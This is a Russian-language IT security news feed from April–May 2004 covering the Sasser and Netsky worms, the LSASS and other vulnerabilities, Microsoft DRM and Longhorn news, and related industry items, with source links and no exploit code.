Microsoft обнародовала детали многократно задерживавшегося обновления своей технологии защиты цифрового контента с антипиратскими функциями для мобильных устройств и домашних сетей. Ожидавшаяся еще год назад, эта технология с кодовым названием Janus рассматривается как способ организовать службы распространения музыки по подписке, подобные Napster и Rhapsody от RealNetworks, для портативных МР3-плееров. Сегодня такие службы, позволяющие подписчикам прослушивать неограниченное количество музыки за фиксированную ежемесячную плату, обычно ассоциируются исключительно с ПК. Однако новые инструменты управления цифровыми правами могут защищать и контент, передаваемый по домашней сети, или даже блокировать потенциально «небезопасные» каналы передачи данных вроде традиционных аналоговых выходов телевизоров высокой четкости изображения. Это та самая возможность, которую искали киностудии, прежде чем перейти на цифровое телевидение. Microsoft уверена, что новая надежная версия технологии защиты контента поможет ее аудио и видеоформатам стать стандартными средствами распространения цифровой музыки и фильмов, что в свою очередь будет способствовать продажам операционной системы Windows и сопутствующих продуктов.
Подробности

5/05/2004 18:38 Эксплоит уязвимости Lsasrv.dll.
Опубликован исходный код уязвимости, обнаруженной в библиотеке Lsasrv.dll и залатанной Microsoft бюллетенем MS04-011. Написан для win32.
Исходник

5/05/2004 17:36 Luna SP обезопасит Java-приложения
После слияния с Rainbow Technologies компания SafeNet продолжает развивать семейство продуктов Luna. Новое устройство Luna SP разработано для облегчения внедрения защищённых Java-приложений. Высокая вычислительная мощность - более 1200 транзакций в секунду (1024-bit RSA операций), интегрированный аппаратный модуль защиты, соответствующий уровню 3 стандарта FIPS 140-2, и гибкие возможности подключения Luna SP к сетям позволят предприятиям разрабатывать и использовать высоконадёжные Java-приложения. Luna SP позволяет ИТ-администраторам осуществлять строгий контроль за имеющими цифровую подпись (сертификат) исполняемыми приложениями, что предохраняет от подмены кода и гарантирует целостность приложений. Все данные, относящиеся к криптографическим ключам, находятся исключительно внутри модуля HSM. Доступом к ключам можно управлять через специализированный защищённый терминал и через политики безопасности, управляющие доступом к приложениям.
Источник

5/05/2004 17:21 "Лаборатория Касперского" выпустила новую версию антивируса MS ISA Server
"Лаборатория Касперского" сообщила о коммерческом выпуске "Антивируса Касперского 5.1" для Microsoft ISA Server. По сравнению с предшествующей версией, Антивирус Касперского 5.1 для Microsoft ISA Server включает в себе ряд технологических изменений, значительно расширяющих функциональность программы. "Антивирус Касперского" для Microsoft ISA Server представляет собой систему антивирусного контроля над файлами, поступающими по протоколам HTTP и FTP через межсетевой экран Microsoft Internet Security and Acceleration Server. Программа выполняет функцию фильтра, обрабатывающего входящий трафик с целью выделения контролируемых объектов и их последующего анализа на присутствие вредоносного кода. В случае обнаружения зараженных данных система блокирует их дальнейшую передачу и производит нейтрализацию, полностью исключая проникновение вирусов в локальную сеть организации. Одним из основных отличий усовершенствованной версии "Антивируса Касперского" для Microsoft ISA Server является реализация поддержки расширений протокола FTP. Это позволило повысить эффективность работы приложений, использующих расширенный набор FTP-команд, без снижения уровня защищённости. Новинка также стала более удобной для администратора, сообщила пресс-служба компании. Администратор, используя стандартные средства Microsoft ISA Server, сможет получать сообщения о возникших проблемах по электронной почте и/или инициировать выполнение каких-либо автоматических операций. Кроме этого, стандартные инструменты Microsoft ISA Server стали доступны администратору не только для диагностики сетевых атак, но и для отслеживания повышенной вирусной активности, за счет возможности отправки уведомлений не по каждому выявлению зараженного файла, а лишь при превышении установленного порога обнаружения в единицу времени.
Источник

5/05/2004 17:06 У Longhorn будет серверная версия
На нынешней неделе в Лас-Вегасе открылась очередная конференция Microsoft для разработчиков аппаратного обеспечения WinHEC 2004. Наэтой конференции софтверный гигант продемонстрировал различные концептуальные разработки и представил дополнительную информацию о своих новых программных продуктах и срока их выхода на рынок. С речью на конференции выстпил, в частности, руководитель подразделения по разработке Windows Джим Оллчин. В выступлении Оллчина помимо демонстрации различных концептуальных разработок, прозвучала некоторая новая информация об операционной системе Longhorn. Оллчин еще раз подтвердил, что Microsoft выпустит бета-версию Longhorn в 2005 году. О сроках выпуска окончательной версии Оллчин предпочел не распространяться. Ранее говорилось, что новая версия Windows будет выпущена в первой половине 2006 года. Оллчин также провел сравнительную демонстрацию графических возможностей Windows XP и Longhorn. В случае Longhorn воспроизведение видео и анимации в нескольких окнах одновременно шло более плавно, чем в Windows XP. Однако после того как в дополнение к видео была запущена игра Quake, компьютер благополучно завис. Впрочем, учитывая тот факт, что использованная версия Longhorn была ранней альфой, ничего необычного в таком сбое нет. Важно отметить и то, что Оллчин наконец-то пролил свет на вопрос о выходе серверной версии Longhorn. Напомним, что в 2003 году руководство Microsoft никак не могло определиться с тем, будет ли у Longhorn серверная версия и если да, то когда она выйдет. В своем выступлении Джим Оллчин рассказал, что серверная и клиентская версии Longhorn выйдут одновременно.
Подробности

5/05/2004 16:50 Sun рассматривает возможность смены лицензии Solaris на GPL
По утверждению Джонатана Шварца, недавно назначенного на пост президента Sun, корпорация рассматривает возможность создания бесплатной версии своей ОС Solaris, распространяемой под GPL, cообщается на linux.org.ru. Хотя в прошлом Sun и относилась к GPL достаточно прохладно, Шварц утверждает, что немногое препятствует открытию исходников под этой лицензией. Sun могла бы использовать бизнес-модель, аналогичную RedHat - продавать контракты на поддержку. Основные опасения у компании вызывает склонность GPL поощрять форкинг проектов - "как это сделала RedHat с Linux", говорит Шварц. В любом случае, Sun планирует "очень быстро" перейти к бесплатной модели лицензирования, когда доход идет от платной подписки. Конкретные сроки и цены не называются, но утверждается, что цены будут "меньше, чем у RedHat". На самом деле, если Sun действительно откроет исходники Solaris под GPL, то ее бизнес-модель не будет принципиально отличаться от таковой для RedHat. По словам Шварца, "Между RedHat нами не будет различий, кроме того, что мы продвигаем открытые стандарты".
Статья

5/05/2004 16:04 У Sasser и Netsky одни и те же авторы?
По крайней мере, так утверждает сообщение, закопанное в недрах очередной модификации почтового вируса Netsky ("Hey av firms, do you know that we have programmed the sasser virus?!? Yeah, thats true"). По словам исследователей, приложенные в качестве доказательства фрагменты исходного кода Sasser'а действительно похожи на правду - да и многие элементы этих вирусов, такие как генератор случайных чисел, у них практически совпадают, сообщает bugtraq.ru. Есть сходство и в развитии ситуации - первые модификации Netsky были признаны не слишком опасными, но после усовершенствования в последующих версиях он разошелся очень широко. Sasser тоже развивается, уже появились модификации .C, в которой возросло количество системных ресурсов, занимаемых для поиска зараженных хостов, и .D, в которой используется более быстрая техника сканирования.
Подробнее

5/05/2004 15:40 В Интернете ширится эпидемия нового вируса
Масштабы начавшейся в конце прошлой недели эпидемии очередного вируса продолжают увеличиваться. Специалисты по компьютерной безопасности уже зафиксировали четыре модификации нового "червя", получившего название Sasser. Вирус использует уязвимость в службе LSASS операционных систем Windows 2000, Windows XP, Windows 2000 Server и Windows 2003 Server. Информация об этой уязвимости была недавно обнародована компанией Microsoft одновременно с выходом исправлений для указанных ОС, которые ликвидируют проблему. Тем не менее, в Сети остается большое количество компьютеров со старыми версиями операционных систем - находясь на одной зараженной машине, вирус ищет такие компьютеры, сканируя интернет на предмет наличия вышеупомянутой уязвимости службы LSASS, и заражает их. Характерным признаком того, что компьютер заражен, является, в частности, беспричинная его перезагрузка. Как передает CNN, одновременно начал распространяться также особый тип почтового вируса, который выдает себя за программу для лечения от вируса Sasser, в действительности поражая компьютер модификацией известного вируса NetSky. Специалисты отмечают, что в теле вируса Sasser содержится послание разработчикам антивирусного ПО, аналогичное тому, что присутствует в теле NetSky, что, вероятнее всего, говорит об одном и том же авторе обоих "червей". Методы борьбы, которые советуют применять специалисты, традиционны: регулярно обновлять операционную систему на сайте Windows Update, регулярно проверять свой компьютер на наличие вирусов с помощью антивирусных программ, базы которых таже необходимо регулярно обновлять (как минимум раз в две недели, а также после сообщений в СМИ о вирусных эпидемиях). Для защиты от червя Sasser пользователям рекомендуется также устанавливать межсетевые экраны (файрволы).
Источник

5/05/2004 14:54 Уязвимость переполнения кучи в Apple QuickTime "QuickTime.qts"
eEye Digital Security обнаружила уязвимость в Apple Quicktime 6.x и iTunes 4.x. Компонент QuickTime ("QuickTime.qts") используется различными приложениями для получения функциональности QuickTime. Уязвимость возниает из-за ошибки переполнения переменной целого типа при обработке QuickTime-format movie (".mov" файлов). Согласно eEye Digital Security, в результате возможно выполнение произволного кода на машине пользователя. Однако Apple утверждает что возможно лишь преждевременное завершение приложения.
Описание уязвимости eEye, US-CERT

5/05/2004 14:52 Уязвимость в продуктах Check Point VPN-1
Уязвимость обнаружена в различных продуктах Check Point VPN-1: VPN-1 SecureClient; VPN-1 SecuRemote; VPN-1/Firewall-1 NG; VPN-1/FireWall-1 NG with Application Intelligence (AI); VPN-1/FireWall-1 VSX NG; в результате ошибки в реализации ISAKMP при установлении VPN канала. В результате обработки специально созданного пакета возможно выполнение произвольного кода из-за переполнения буфера. Check Point уже выпустил хот-фиксы.
Original Advisory

4/05/2004 14:41 Обзор самых опасных уязвимостей (Апрель 2004 года)
На SecurityLab.ru опубликован обзор уязвимостей апреля 2004 года.
За месяц было обнаружено более 220 уязвимостей, более чем в 200 программных продуктов и операционных систем.
Самой опасной уязвимостью, обнаруженной в прошлом месяце, является уязвимость удаленного переполнения буфера в LASS (Local Security Authority Subsystem Service) в Windows 2000/XP. Количество потенциально уязвимых систем превышает 500 миллионов.
10 наиболее опасных уязвимостей обнаруженных в апреле 2004 года:
1 Удаленное переполнение буфера в LASS (Local Security Authority Subsystem Service) в Windows 2000/XP
2 Переполнение буфера в Private Communications Transport (PCT) в Windows NT/2000
3 Уязвимость в большинстве реализаций TCP стека позволяет удаленному атакующему вызвать отказ в обслуживании
4 Уязвимость поднятия привилегий в Utility Manager в Windows 2000/XP
5 Переполнение буфера в Winamp "in_mod.dll"
6 Удаленное выполнение произвольного кода в Outlook Express 5.5 и 6.0
7 Уязвимость в Symantec Norton Internet Security и Symantec Norton Personal Firewall позволяет удаленному атакующему получить полный контроль над уязвимой системой
8 Удаленное переполнение буфера в eMule
9 Переполнение буфера в обработке R3T файлов в RealOne и RealPlayer
10 Переполнение буфера в Microsoft Internet Explorer и Microsoft Windows Explorer в обработке имен сетевых ресурсов
Источник

2/05/2004 19:21 Обнаружен новый червь: Sasser
Червь распространяется по сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. При запуске червь регистрирует себя в ключе автозапуска системного реестра. Уязвимый компьютер на TCP-порту 9996 запускает командную оболочку "cmd.exe" и принимает команду на загрузку и запуск копии червя. Загрузка выполняется по протоколу FTP. Для этого червь запускает FTP-сервер на TCP-порту 5554 и по запросу с уязвимого компьютера загружает туда свою копию. Загруженная копия имеет имя "N_up.exe", где N - случайное число.
Источник

2/05/2004 19:17 Незаконная торговля зараженными машинами
Сыщики всех стран наконец-то проснулись когда узнали, что существуют "черные рынки" (спец. IRC каналы), на которых можно приобрести доступ ко множеству чужих машин подключенных к интернету по каналам скоростной связи (DSL, etc). Продают списки таких машин в основном вирусописатели и третьи лица перекупающие их у вирусописетелй, а вот покупателями такого товара являются злоумышленники, которые впоследствии используют уязвимые компьютеры для рассылки спама, проведения DDoS атак и как средние звенья для скрытия своего местонахождения при проведения единичных атак с целью получения несанкционированного доступа.
Источник

2/05/2004 19:02 Митник помогает детективам найти телефонного мошенника
Чтобы найти злоумышленника угрожающего взорвать школу в пригороде Детройта, у американских полицейских не хватило квалификации. Лейтенанту Джону Кеку не удалось проследить, откуда были сделаны звонки с угрозами, поэтому он полез искать информацию в интернете. Однако и это не помогло, но зато, в интернете он узнал про Кевина Митника и обратился к нему за помощью. Добрый Митник раскрывает лейтенанту тайну о том, как проследить откуда был сделан звонок и при помощи Митника находится школьник, который делал звонки с угрозами прямо из класса. Оказывается не только в России есть кроме "компетентных" органов и менее "компетентные", которые не в состоянии разобраться в стандартной ситуации.
Ичтоник

1/05/2004 12:45 Allofmp3.com "выходит на международный уровень"
Если, конечно, можно так сказать об интернет - ресурсе ;)
Как сообщает dl на bugtraq.ru, репортер Sydney Morning Herald, накупив в allofmp3 за 50$ 968 аудиотреков помегабайтно, посчитал, сколько бы это стоило в эппловском iTunes Music Store. Получил сумму 958$, после чего задумался о достаточности для подобной красоты лицензии РОМС, согласно которой торгует allofmp3. Случайное ли это совпадение, или нет, но буквально сегодня некоторое время allofmp3.com был недоступен. Сейчас на сайте висит объявление о проведении работ по повышению производительности и о приостановке услуг по подготовке и скачиванию файлов - не исключено, что это связано с наплывом распробовавших вкусное иностранцев. Как говорится, привет RIAA.
И еще пара любопытных, но не имеющих прямого отношения к делу фактов в копилку: бесплатное VIP-членство в allofmp3 является одной из заманивающих конфеток "Стрима", а отчисления РОМС платит и библиотека Мошкова.
Источник

1/05/2004 00:29 Пересылка файлов без электронной почты
В РуНете появился новый, пока бесплатный сервис WebFile для обмена файлами, который позволяет закачать на сервер webfile.ru файл объемом до 20Мб, загруженный на сервер файл получит простой адрес вида webfile.ru/1914, который можно легко запомнить и сообщить своим друзьям, срок хранения файла ограничен 7 или 14 днями, после чего он удаляется с сервера. Чтобы предохранить файл от несанкционированного доступа, вы сможете защитить его паролем. Из дополнительных удобств также доступна статистика скачиваний файла, уведомление по электронной почте и возможность удалить файл до окончания срока.
Источник - Компьюлента

30/04/2004 02:02 Проблема с SSL-патчем на Windows 2000 машинах
Новая проблема с продуктами от Microsoft. Microsoft Corp. сообщила вчера, что после установки недавно выпущенного обновления для Windows, некоторые машины с установленной Windows 2000 перестают нормально работать. Возможно, что некоторые машины после установки MS04-011 перестают отвечать, не позволяют залогиниться пользователю или системный процес занимает 100% времени процессора, сообщается в статье из Knowledge Base online-библиотеки. Также там описаны меры, которые нужно предпринять, чтобы решить эту проблему. Патч был выпущен 13 апреля. Он закрывает несколько дыр в Windows системах, включая проблему с Windows-реализацией Secure Sockets Layer протокола.
Microsoft Knowledge Base Article
computerworld.com

30/04/2004 01:51 Red Hat получила сертификат безопасности EAL2
Red Hat Linux поучил сертификат безопасности, что приблизило его к конкурентам. В четверг Red Hat Enterprise Linux был сертифицирован на соответствие стандарту Evaluation Assurance Level 2 (EAL2) Основного Критерия сертификации (Common Criteria certification). Однако, Red Hat по-прежнему остается позади основного конкурента - Novell - чья SuSE Linux отвечает стандарту EAL3, которая в свою очередь следует за Unix и Windows, имеющих EAL4 сертификацию.
news.com.com

30/04/2004 01:49 Музыкальная индустрия борется с музыкальным пиратством
В среду в США были возбуждены дела против 477 компьютерных пользователей, среди которых десятки студентов колледжей из 11 штатов, за нелегальное распространение музыки через Интернет. Американская Ассоциация записывающей индустрии (Recording Industry Association of America), объединяющая держателей самых известных торговых марок, приложила много усилий для прекращения музыкального пиратства в локальных сетях коледжей и университетов. Самые злостные нарушители будут осуждены. Эта акция нужна еще и для того, чтобы напоминать людям, что такая деятельность незаконна, сказал президент ассоциации Cary Sherman.
www.cnn.com

30/04/2004 01:47 Microsoft научит безопасности с помощью pop-up
На конференции, посвященной информационной безопасности, проходящей в Лондоне, Infosecurity 2004, Microsoft объявила о своих планах посвящать пользователей в вопросы безопасности путем дополнительных всплывающих диалоговых окон в Windows и Office. Окна будут появляться, чтобы предупредить пользователя, когда он попытается выполнить какую-нибудь небезопасную операцию, например запустить программу из аттачмента. Microsoft обещает, что новая система подсказок в виде диалогов будет отличаться от помошника из Office (кривляющейся скрепки), который очень часто вызывал раздражение у пользователей. Джонатан Перера (Jonathan Perera), представитель Microsoft, сказал, что диалоговые окна интуитивно понятными пользователям.
zdnet.com.com

29/04/2004 23:49 Microsoft подтвердила, что выход Service Pack 2 для Windows XP задерживается
Выход Service Pack 2 для Windows XP задерживается. Несколько дней назад эта информация просочилась в Интернет. (наш сайт сообщал об этом в новостях). Теперь эту информацию подтвердили в Microsoft. Ранее предполагалось, что SP 2 выйдет в первом полугодии, теперь выход самого ожидаемого обновления отложен по крайней мере на июль. Представитель Microsoft сообщил, что продукт пока еще не соответствует стандартам компании, и его отправили на доработку и дополнительное тестирование. Бета-версия SP 2 была опубликована еще в декабре, Release Candidate 1 вышел в марте, выход Release Candidate 2 по-прежнему намечен на май, не смотря на то что выход окончательной версии задерживается. SP2 для Windows XP это больше чем просто обновление и исправление багов, в нем также заложены значительные изменения для увеличения безопасности. Изменения в основном коснутся четырех областей: защиты памяти, сетевой защиты, e-mail безопасности и "browsing"-безопасности. Изменения на столько значительны, что Microsoft предупредила разработчиков, что они должны протестировать свое ПО с SP2, т.к. увеличение безопасности в некоторых случаях происходило в ущерб поддержки совместимости.
www.crn.com
computerworld

29/04/2004 13:36 Независимый разработчик выпустил сервис-пак для Win98 SE
Вышел сервис-пак для Windows 98 Second Edition. Очень своевременно, не правда ли? И к тому же он был выпущен не Microsoft. В прошлую пятницу энтузиаст и независимый разработчик Alper Coskun выложил на свой веб сайт "Service Pack 1.5" for Windows 98 SE. Естественно он называется "Неофициальный" (Unofficial), хотя содержит в себе все обновления и хот-фиксы выпущенные Microsoft и заботливо собранные в один инсталяционный пакет. Сервис-пак включает в себя 70 хот-фиксов, обновления для поддержки USB и др. Включены только обновления операционной системы, а не сопутствующих программ, таких как IE или Media Player. Microsoft выпускала "Service Pack for Windows 98" в 1999 году, и никогда не выпускала SP для Second Edition. Windows 98 SE относится к устаревшим продуктам Microsoft, с июня 2003 прекращена ее поддержка, а с 2006 года перестанут выпускаться и кретические заплаты по безопасности. Несмотря на это, пока велико число пользователей и сторонников этой ОС по всему миру. Корпорация Microsoft никак не прокомментировала выход этого сервис-пака, однако относится негативно к тому что обновления для своего продукта доступны для скачивания не непосредственно с microsoft.com.
Сайт Alper Coskun
Источник

29/04/2004 12:49 Netsky.x активировался и атаковал
Червь Netsky.x, появившийся в сети около недели назад, активировался 28 апреля и успешно провел DoS атаку на три образовательных сайта, в результате чего два из них в первый день оказались недоступны. Версия X червя Netsky одна из тех, которые запрограмированы на проведение DoS атаки против nibis.de, medinfo.ufl.edu, и educa.ch - трех образовательных сайтов, расположенных в Германии, Америке и Швейцарии. DoS атака, которая началась вчера и продлится до 30 апреля с инфицированных Netsky.x компьютеров, успешно вывела из строя немецкий и американский сайты, сообщает Ken Godskind, вице-президент фирмы AlertSite, занимающейся веб-мониторингом во Флориде. Сайт из швейцарии меньше всего пострадал от атаки, он был доступен на 80-90%, тогда как немецкий сайт - всего лишь процентов на 20, а американский - сайт медицинского колледжа во Флориде - недоступен вообще, говорит Ken Godskind. Однако после обеда все три сайта вновь заработали. Другие варианты Netsky - Netsky.y и Netsky.z - также должны атаковать эти сайты, их атака начнется в первых числах и продлится вплоть до 5 мая.
TechWeb News

29/04/2004 12:47 Стартовал восьмой Российский интернет-форум
28 апреля в подмосковном пансионате "Липки" стартовал восьмой Российский интернет-форум. Организаторами форума выступили семь крупных компаний: RLE/AdRiver, Mail.ru, "Корпорация ОСС", "Рамблер", РТКОММ, TeliaSonera, "Яндекс", а также Региональный общественный центр интернет-технологий (РОЦИТ). В рамках РИФ 2004 будут обсуждаться основные проблемы операторов и пользователей, которых в России насчитывается уже свыше десяти миллионов человек, вопросы коммерческого использования интернет-пространства, перспективы внедрения платных услуг и уровень развития торговли в Сети. Кроме того, организаторы намерены уделить внимание онлайновым средствам массовой информации и поисковым системам. Естественно, будут сделаны и прогнозы в отношении дальнейшего роста российского интернета. В РИФ 2004 принимают участие представители таких известных компаний, как 3DNews, ABBYY Software, Microsoft, Paragon Software Group, Samsung Electronics, "Альфа-банк", "М.Видео", "МегаФон", ПРОМТ и многие другие. Подробности можно найти на официальном сайте Российского интернет-форума.
РИФ и compulenta.ru

28/04/2004 16:37 Многонациональная команда решила крипто-задачу с 576-битным ключом
Более трех месяцев понадобилось команде математиков из Европы и Северной Америки чтобы решить криптозадачу предложенную RSA Security. Восемь экспертов из разных стран мира использовали окло 100 рабочих станций в соревновании за приз в $10,000. Их заданием было определить два числа, которые потом используются для генерации других 8 чисел в основном алгоритме RSA с 576-битным ключом. Соревнование по RSA создано для того, чтобы помочь протестировать устойчивость алгоритмов с длинным ключом, используемых в в электронике для обеспечения безопасности. Результаты соревнования предполагается применить в теории вычислений и для оценки практической сложности факторизации больших чисел. "Информация, полученная в ходе соревнования очень важна для криптографического сообщества и может быть полезной для организаций при выборе подходящих мер для обеспечения требуемого уровня безопасности," сказал Burt Kaliski, ведущий ученый и руководитель RSA Laboratories. RSA-576 это пример алгоритма этого типа с облегченным ключом, рекомендованного для защиты Интернет- и беспроводных транзакций. Типичная длина ключа составляет как минимум 1024 бита (310 десятичных цифр); RSA-576 это 576-битный ключ (174 десятичные цифры). Следующий пример ключа из этой серии - RSA-640. Эксперты, включенные в этот проект, представляют две исследовательские группы из Германии, из Scientific Computing Institute и Pure Mathematics Institute, и одну из Нидерланд, из National Research Institute for Mathematics and Computer Science. А также несколько теоретиков из Канады, США и Англии.
CNET News.com

28/04/2004 14:18 Спам мешает работать провайдерам
Теперь крупнейший новозеландский интернет-провайдер пострадал от спама. Работа его систем настолько замедлена, что электронные письма доставляются медленне чем обычные, пишет INQUIRER. Согласно stuff.co.nz, вчера время доставки электронного письма доходило до 24 часов из-за того что их сервера были настолько загружены. За это же время Почтовая служба Новой зеландии доставляет обычное письмо адресату в том же городе. Представитель Xtra сообщила, что это временная проблема, вызванная катастрофическим увеличением почтового траффика. Она также сообщила, что почтовый траффик увеличился вдвое за последние три месяца, а число писем, содержащих вирусы, возросло на 60%.
INQUIRER

28/04/2004 14:17 Microsoft media player теперь работает под Linux
INQUIRER сообщает, компания TURBOLINUX сделала media player который включает в себя код Microsoft-а, согласно сообщению вчерашнего выпускаа газеты Nihon Keizai Shimbun. Заметка сообщает что новый плейер будет доступен пользователям Linux в Японии, Китае и США. Японская компания заплатила Microsoft за право использования исходного кода Windows Media Player и распространения своей программы вместе с Linux, сообщает газета.
INQUIRER

28/04/2004 13:15 Выход SP2 для Windows XP задерживается
Веб сайт Winbeta сообщает, что выход второго сервис-пака для Windows XP задерживается. Источники сообщают, что SP2 не выйдет до 21 июля этого года. Подробности можно прочитать на сайте.
INQUIRER

28/04/2004 11:49 Linspire расширяет функциональность своей операционной системы
Компания Lindows объявила о выпуске двух мультимедийных приложений Lsongs и Lphoto, которые в будущем войдут в состав некоторых версий операционных систем Linspire. Первый пакет предназначен для работы со звуком. Посредством этой утилиты можно воспроизводить аудиофайлы различных форматов, слушать потоковые трансляции, кодировать музыку, записывать CD, организовывать плейлисты и пр. Как отмечается в пресс-релизе, Lsongs совмещает возможности сразу нескольких Linux-программ в одном пакете. Приложение Lphoto, в свою очередь, поможет создать цифровой фотоальбом, просмотреть графические файлы различных форматов и отправить снимки по электронной почте. Среди возможностей утилиты стоит выделить функции масштабирования, изменения яркости и несложные фильтры.
compulenta.ru

27/04/2004 16:26 Испания заблокирована анти-спамными фильтрами
Крупнейший государственный интернет-провайдер испании Telefonica De Espana (TDE) заблокирован многими американскими веб-сайтами, сообщает INQUIRER. TDE самый именитый спамер, попавший в спам-листы (Abusive Hosts Blocking List (AHBL)), которые используются американскими провайдерами для блокирования спамеров со всего мира. Согласно AHBL пользователи TDE рассылали тысячами письма содержащие рекламу и различные финансовые аферы. Это редкий случай когда в список попал интернет-провайдер, но AHBL сообщает что, по-видимому, TDE совершенно не заботит количество спама, проходящего через них, они не предприняли никаких, даже самых простых, мер. Сообщение на сайте AHBL гласит: "Единственная причина, по которой мы внесли TDE в блок-список, это то, что они не продемонстрировали усилий для решения этой проблемы, и мы продолжаем получать тысячи писем, содержащих спам, каждый день." TDE же сообщила, что большинство спама рассылается из интернет-кафе. TDE имеет более 50 млн пользователей.
INQUIRER

27/04/2004 16:23 Паспортная служба Великобритании испытывает систему биометрической идентификации
Паспортная служба Великобритании (The U.K. Passport Service) вчера (26 апреля) запустила тестовую версию биометрической системы, которая за 6 месяцев охватит более 10 тысяч добровольцев. В тот же день Английское правительство приняло проект закона, который заставит всех граждан страны получить биометрические идентификационные карты в принудительном порядке. По предложению Государственного секретаря англии, Давида Бланкетта (U.K. Secretary of State for the Home Department David Blunkett), сделанному им в ноябре, идентификационные карты, будут хранить биометрическую информацию во встроенном микрочипе, который будет связан с национальной базой, называемой Национальным Идентификационным Реестром (National Identity Register).
computerworld

27/04/2004 14:34 12 шагов по увеличению стабильности Windows системы
SearchWin2000.com опубликовал материал, в котором говорится как повысить стабильность работы системы. Две вещи которые каждый администратор ожидает от своей системы это стабильность и безопасность. Когда безопасности находятся полностью под вашем контролем, посмотрим что можно сделать, чтобы быть уверенным что ваша система работает стабильно. Далее в материале дается 12 советов, которым должен следовать каждый администратор. Среди них такие как:
- не используйте административный пароль;
- не скупитесь на оборудование;
- не смешивайте разные драйвера;
- не принебрегайте обновлением;
и другие.
подробнее...

27/04/2004 14:33 Основатель Google живет скромно
Журналист Reuters взял интервью у отца одной из самых известных фигур в мировом Интернет-сообществе, со-основателя и президента Google, Сергея Брина. Михаил Брин - русский имигрант, в прошлом математик и экономист, работал в госплане. В 1979 году с женой и маленьким сыном Сергеем он покинул СССР и поселился в Stanford где до сих пор преподает в университете (University of Maryland). В иммиграции он потратил много времени на написание книги в которой утверждается, что стандарт жизни в СССР гораздо выше чем в США. "Я не понимаю, как годы брежневского развития экономики теперь называют застоем", говорит он в интервью. Михаил Брин уехал из-за растущего анти-семитизма и ради будущего своего сына. Его сын покинул Stanford и основал Google. Но не смотря на классический американский спех, он живет скромно, проживает в съемной двухкомнатной квартире и ездит на Toyota Prius. "У него нет много денег, и у меня нет много денег", говорит его отец.
Reuters
INQUIRER

27/04/2004 12:43 Вирусописатели спрашивают "по ком звонит колокол"
Последняя версия вируса Bagle, кроме строф Джона Донна и Вильяма Блейка, содержит стихотворение, по-видимому написанное автором вируса. Стихотворение из четырех строк, написанное заглавными буквами, гласит:

"Unique people make unique things
That things stay beyond the normal life and common understanding
The problem is that people don't understand such wild things,
Like a man did never understand the wild life."

Уникальные люди делают уникальные вещи.
Но они становятся далеки от нормальной жизни.
Проблема в том, что люди не понимают эти дикие вещи,
как я никогда не понимал этой дикой жизни.
(перевод newsmaker-а)

Это не первый случай, когда авторы вирусов "заставляют страдать" от своей поэзии. Первый Apple II вирус показывал стихотворение каждый 50й раз, когда инфицированный компьютер загружался. Сначала Bagle.Z имел сравнительный успех, т.к. он расспространялся как аттачмент по электронной почте в .cpl (control panel file) файле, этот вид исполняемых файлов ранее вирусами не использовался. Однако, по-видимому скоро этот вирус, как и стихотворение безвестного автора, канет в лету не оставив следа.
INQUIRER
также CNET
также zdnet

27/04/2004 12:08 Хакеры попытались взломать банк через бек-дор (back door)
Хакеры, предположительно из Бразилии, Германии и Недерландов попытались проникнуть в один из крупнейших австралийских банков в конце прошлой недели, сообщает INQUIRER. Группа предприняла несколько атак, используя дыры в ОС Windows. Атака была пресечена Системой безопасности (Internet Security Systems - ISS) и все австралийские учреждения были предупреждены. Интересно, что хакеры воспользовались одной из 14 уязвимостей описанных в последнем бюлетене безопасности от Microsoft - MS04-011, который вышел 13 апреля. Представитель ISS не сообщил, были ли своевременно пропатчены все компьютеры финансовых организаций, но сказал, что атака хакеров была безуспешной.
INQUIRER

27/04/2004 12:07 Кредитка с распознаванием голоса
Компания Beepcard разработала кредитную карточку нового типа. Карта со встроенным чипом для распознавания голоса опознаёт пользователя при произнесении пароля. Прототип, созданный в Beepcard, имеет размеры обычной кредитной карты, но толще её в три раза, содержит микрофон, динамик, батарейку и микросхему распознавания голоса. Карта работает следующим образом: c помощью встроенного динамика посылается код, звуковой сигнал, который улавливается микрофоном, подключенным к компьютеру. Данные передаются на сервер, проводящий транзакцию, в ответ сервер возвращает новый код, который будет использован при следующем сеансе связи. Перед этой процедурой владелец карты должен произнести пароль. Если звуковые характеристики голоса не совпадут с записанными на карте, транзакция проведена не будет.
compulenta.ru

27/04/2004 12:05 В Москве открылась Comtek-2004
26 апреля в столичном "Экспоцентре" стартовала компьютерная выставка IT-Week, ранее носившая название Comtek. Под этим именем выставка известна многим российским компьютерщикам, для которых ежегодный поход на Comtek был своеобразной традицией. Ведь в течение недели посетителям предлагались новинки hi-tech, которые демонстрировались на выставках в США и Европе. Многие из моделей, возможно, не появятся в продаже на российском рынке вообще.
compulenta.ru

26/04/2004 18:54 Курсанты военных училищ изучают искусство кибер-войны
Миссия: защитить компьютерную сеть США и их союзников от вражеского вторжения. Цель вражеских агентов - нарушить эти планы, уничтожить базы данных, компьютерные терминалы и коммуникации. Это не научная фантастика и не съемочная площадка Голивуда. Это четырехдневное соревнование состоявшееся на этой неделе, в которой приняли участие кадеты из West Point, слушатели военной академии и других учебных заведений, сообщает Reuters. Их противниками были никто иные как комманда из Национального Агенства безопасности (National Security Agency). Кибер-война, как часть классической информационной войны, имеет древние корни и поэтому с развитием Интернета этот предмет теперь изучается в военных учебных заведениях США.
Reuters

26/04/2004 18:27 Переполнение буфера в Win-системах
Переполнение происходит при подключении к сетевой папке с длинным именем.
Уязвимости подвержены Win9x, WinNT.
Rodrigo Gutierrez, обнаруживший данную уязвимость сообщает, что корпорация Microsoft была извещена и планировала включить обновление в SP1 для WinXP и SP4 для Win2000:
"I notified the vendor in the beginning of 2002, this vulnerability was supposed to be fixed in xp service pack 1 in XP and SP4 in Windows 2000 according to the vendors knowledge base article 322857.
Источник

26/04/2004 13:51 Microsoft озабочено дырами в Windows
